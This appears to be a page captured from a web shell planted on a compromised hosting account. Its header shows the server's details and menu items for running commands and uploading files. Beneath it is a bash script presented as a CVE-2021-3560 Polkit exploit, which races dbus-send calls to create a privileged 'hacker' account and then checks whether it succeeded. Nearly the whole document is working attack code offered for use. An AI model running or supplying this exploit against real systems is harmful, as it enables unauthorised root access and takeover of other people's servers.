|
Server IP : 2a02:4780:8:613:0:1a7d:6e18:10 / Your IP : 216.73.217.34 Web Server : LiteSpeed System : Linux nl-srv-web513.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64 User : u444427800 ( 444427800) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u444427800/domains/sahyogwelfarefoundation.com/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
#!/bin/bash
# CVE-2021-3560 Polkit Exploit - Bash version
echo "[*] Trying CVE-2021-3560 Polkit..."
# Function to check if vulnerable
check_vuln() {
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hacker string:"Hacker" int32:1 2>&1 | grep -i "failed"
}
# Try multiple times (race condition)
for i in {1..20}; do
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hacker string:"Hacker" int32:1 >/tmp/out 2>&1 &
sleep 0.01
kill $! 2>/dev/null
done
# Check if user created
id hacker 2>/dev/null && echo "[+] User 'hacker' created!"